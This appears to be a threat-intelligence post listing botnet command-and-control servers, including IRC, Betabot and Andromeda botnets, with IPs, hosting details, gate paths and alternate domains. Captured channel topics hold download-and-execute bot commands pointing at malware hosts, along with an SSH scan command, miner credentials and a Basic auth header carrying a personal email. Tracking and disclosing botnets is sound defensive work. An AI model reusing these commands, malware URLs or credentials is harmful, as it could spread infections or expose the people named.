Resolved : [pool.50btc.com] To [144.76.52.43] HTTP Requests: hxxp://pool.50btc.com:8332/ DATA: POST / HTTP/1.1Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==Content-Length: 128X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchtoUser-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3) Host: pool.50btc.com:8332Cache-Control: no-cache {“method”: “getblocktemplate”, “params”: [{“capabilities”: [“coinbasetxn”, “workid”, “coinbase/append”, “longpollid”]}], “id”:0} Here the hecker: lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332 Sample:hxxp://158.255.2.104/cucaz.exe hosting infos: http://whois.domaintools.com/144.76.52.43
hi.loldump.org(irc botnet hosted in France Roubaix Ovh Systems)
Resolved : [hi.loldump.org] To [176.31.123.56] Server: 176.31.123.56:8782Server Password:Username: __x00Nickname: {iNF-00-DEU-XP-DELL-9523}Channel: #scanner# (Password: )Channeltopic: :.join #scanner2 hosting infos: http://whois.domaintools.com/176.31.123.56
95.86.207.142(irc botnet hosted in Russian Federation Yaroslavl’ Ojsc Rostelecom Yaroslavl Branch)
Server:95.86.207.142 1866 Channel:#!x! hosting infos: http://whois.domaintools.com/95.86.207.142
122.195.244.35(irc botnet hosted in China Nanjing Huaianwangtongdizhichi Huaian Jiangsu Province)
Server:122.195.244.35:8888 Now talking in #!x!Topic:Topic: Set by [Yuri (unknown address)] at (Thu May 16 09:59:25 2013) other channels: Now talking in #1Topic On: [#1 ] [ !NAZEL hxxp://146.185.246.190/7384IEP.da !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe ]Topic By: [ p81 ] Now talking in #2Topic On: [ #2 ] [!NAZELturbo hxxp://146.185.246.190/7384IEP.da udos.exe | !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe yufck.exe ]Topic By: [ p81 ]Read more...
teamirc.sytes.net(irc botnet hosted in Russian Federation Moscow Broadband Internet Access For Customers Rostelecom)
Resolved : [teamirc.sytes.net] To [188.254.47.158] Server:188.254.47.158:6667Nick: [A|W_XP|1]pfmxdUsername: 20173Joined Channel: #Mirc#Channel Topic for Channel #MirC#: “!dlexec hxxp://46.254.16.170/7.exe” hosting infos: http://whois.domaintools.com/188.254.47.158
irc.e-qacs.com(irc botnet hosted in Denmark Glostrup Nianet A/s)
Resolved : [irc.e-qacs.com] To [130.185.133.134] Server: irc.e-qacs.com:8782 Now talking in #sshscan2 Topic On: [ #sshscan2 ] [ .scan sshgodscan 100 0 0 x.x.x.x -r -n ] Topic By: [ {00-RUS-VISTA-WIN ] found by x00 hosting infos: http://whois.domaintools.com/130.185.133.134
wrightfeldhusen.info (Betabot http botnet hosted by staminus.net)
Resolved wrightfeldhusen.info to 69.197.35.109 Server: wrightfeldhusen.info Gate file: /beta/order.php Alternate domains: akwebdesigner.info websachee.info tincorporated.info thetwenty.info swedishseasons.info lommebags.info andywilsonfs.info ghostgames1.info futureofwebdesign.info vdezignstudio.info waterworks2.info waterworks2.com nordkupp1.info circusbum.info novflex.info This is hosted on the same server as this andromeda bot. Hosting infos: http://whois.domaintools.com/69.197.35.109
fuckencio.com (Betabot http botnet hosted by offshoreracks.com)
Resolved fuckencio.com to 190.14.38.133 Server: fuckencio.com Gate file: /wordpress/order.php Alternate domains: clarocontigosiempre.mobi clarocontigosiempre.us Hosting infos: http://whois.domaintools.com/190.14.38.133
www.panel-gc.co.uk (Andromeda http botnet hosted by staminus.net)
Resolved www.panel-gc.co.uk to 69.197.35.109 Server: www.panel-gc.co.uk Gate file: /panel/gate.php Plugins: hxxp://www.panel-gc.co.uk/panel/fg_00eaffaa.mod hxxp://www.panel-gc.co.uk/panel/rk_242fc383.mod hxxp://www.panel-gc.co.uk/panel/s4_1829dbd8.mod This is andromeda 2.7, not the older cracked version. Bitcoin mining info: -o http://us1.eclipsemc.com:8337 -u Jackpont_1 -p gizmooclad971 -k diablo Hosting infos: http://whois.domaintools.com/69.197.35.109
vhost.bounceme.net(irc botnet hosted in France Paris Nerim Sas)
Resolved : [vhost.bounceme.net] To [194.242.114.177] Server: 194.242.114.177:6667 Server Password: Username: Pmx Nickname: aKH-4mins Channel: #sys# (Password: ) Channeltopic: same guy diferent domain: scan.no-ip.org 194.242.114.177 Server: 194.242.114.177:6667 Server Password: Username: skjcxmot Nickname: [nLh-VNC]otkfck Channel: sex (Password: ) Channel: #bot Channeltopic: Credits to x00 for samples:-) Hosting infos: http://whois.domaintools.com/194.242.114.177